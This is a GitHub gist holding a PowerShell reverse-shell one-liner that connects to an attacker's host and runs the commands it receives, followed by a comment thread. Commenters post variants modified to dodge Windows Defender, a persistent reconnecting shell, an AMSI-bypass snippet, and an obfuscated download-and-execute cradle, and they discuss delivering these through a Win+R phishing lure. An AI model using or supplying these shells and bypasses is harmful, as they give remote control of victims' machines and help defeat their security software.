-
Star
(191)
You must be signed in to star a gist -
Fork
(66)
You must be signed in to fork a gist
-
-
Save egre55/c058744a4240af6515eb32b2d33fbed3 to your computer and use it in GitHub Desktop.
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
Hi, Kindly check my fork.
Just a small change to the way commands are run to ensure any non-stdout text is sent back. (except for confirmation prompts).
Without this, due to the way in which the output of a command run by Invoke-Expression is handled, stderr output never gets sent back even with '2>&1' specified in your current format.
Thanks,
i tried to run it silently by -WindowsStyle Hidden -NoLog but it not working , how can i run it silently
The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"
This actually still works and doesn't trigger anything
Hi, can someone explain how this exactly works? Why is (pwd).Path triggers the antivirus. And is this reverse shell only available until a restart of the victim's pc? I didn't found any explanation online. Thanks in advance.
good job!
It detected AMSI. but I used amsi bypass script before this script running.so this script runs successfully!
Looks like the shell did not return stderr, is it possible to return stderr as well?
hey @mappl3, feel free to add this in your fork and i'll update it ;) . you can also append 2>&1 to the end of a command to get stderr
Got stderr working with this modification:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
And if you want to catch some errors:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);try { $sendback = (iex ". { $data } 2>&1" | Out-String ); } catch { $sendback = "$_`n"}; $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
that's the one-liner updated with your addition for stderr. thanks for your contribution @Veids!
The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"This actually still works and doesn't trigger anything
How would I run this from a bat file and what book do you recommend to learn powershell scripting on this level
Thanks for all your works! I have a question , how can i use this ps1 whit ngrok? If i change ip and port doesnt work on nc -nlvp 4444 (port i forward whit ngrok )
Thanks for all your works! I have a question , how can i use this ps1 whit ngrok? If i change ip and port doesnt work on nc -nlvp 4444 (port i forward whit ngrok )
In order to connect via port 4444, port 4444 has to also be open on your target. Try a different port like 53
while($true){try{$c=New-Object System.Net.Sockets.TCPClient("your server",8880);$s=$c.GetStream();$nl=[Environment]::NewLine;$m=[System.Text.Encoding]::UTF8.GetBytes('asprsh'+$nl+'{"a":"a"}'+$nl);$s.Write($m,0,$m.Length);$s.Flush();[byte[]]$b=0..65535|%{0};while($true){if(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$ec=@("exit", "quit", "bye", "logout", "close");if($d -in $ec) {continue;} else { $g=(iex $d 2>&1 | Out-String );$w=$g+$nl+"PS "+(pwd).Path+"# ";$p=([text.encoding]::ASCII).GetBytes($w);$s.Write($p,0,$p.Length);$s.Flush()}};$c.Close();}catch{Start-Sleep -Seconds 2};};
Congrats bro, you made it into a CompTIA sponsored course on cybersecurity
https://i.imgur.com/eN7OCjl.png
I think I was pretty clear on attribution @jzburda
im having issues getting it to run
i dont see that lol
I've been trying to realize a small phishing campaign and got an idea to use win+R to execute some prepared commands to phish targets (all in educational purposes for my bachelor's). I managed to successfully bypass ESET AV solution, but Defender seems to be stopping me from executing anything that is nearly suspicious from win+R. I've tried -E powershell tag, also tried obfuscating the command but found no success. Did anyone try to play with this?
You'll have to make changes to the existing reverse shell code, you can make use of multiple obfuscation techniques mentioned below, apply these to the above reverse shell code manually, it should do the job
https://github.com/t3l3machus/PowerShell-Obfuscation-Bible
Hey, thanks for the reply.
I think the issue here is that defender's behavior detection is stopping the win+R command from ever running since I never even receive the request for reverse shell on my hosting server.
I have tried obfuscating the command in Win+R but it basically boils down to IEX(download powershell script) which is extremely suspicious to Defender (curiously enough, ESET never gave me any issues with this).
Any ideas to go around this?
So what exactly are you executing on windows run console? A powershell one-liner that reaches out to your server that has the main reverse shell hosted, using Net.WebClient or Invoke-WebRequest and is being executed via Invoke-Expression?
I tried packing up the entire reverse shell one-liner in win+R but you are limited in character space, so there is no one-liner that I could find that can fit into the win+R buffer (I think it's around ~250-260 characters).
So I have tried with Invoke-Expression + Net.WebClient and Invoke-WebRequest (I have tried both, and also a lot of different variations) to fetch the script from the server and execute it, but that's where AMSI behavior detection flags me, I guess there is no way to bypass the AMSI in such small character space.
I did manage to bypass it in regular powershell using these commands, but you need to do it separately one-by-one. Otherwise they get detected as AMSI tampering:
$amsiInitFailedField=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetFields('NonPublic,Static') | Where-Object { $_.Name -like "amsiInitFailed" }
$amsiInitFailedField.SetValue($null, $true)
Like does it block absolutely everything? or just the malicious stuff? Instead of hosting a reverse shell, host a non-malicious command on your server and execute it the same way, see if it works. If your one-liner gets blocked, try applying the obfuscation methods I mentioned above and see if it bypasses, Try using a combination of (invoke-webrequest "serverpayloaduri" ).content | iex or whatever you're using.
It is blocking absolutely everything that tries to fetch something from remote location and execute it, even if its benign script like "calc.exe" . I tried loads of different obfuscations and tampering with the command but none worked.
For example, I tried passing the commands around in powershell and cmd:
powershell -c "$a = 'pow';$b = 'ersh';$c = 'ell';$d = ' -c ';$e = 'InVOkE-EXpreSSIoN (New-OBjECt NeT.WEbCLienT).DowNlOaDSTrinG(''http://$IP/command'')';$f=$a+$b+$c+$d+$e;cmd /c $f"
Well if it is blocking everything, maybe try a different way to deliver your payload? Instead of using powershell?
Will try to investigate some other options, thanks anyways!
Do you maybe know something else that can execute some code but Defender is keeping less tabs on it? Some other binary or anything?
The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"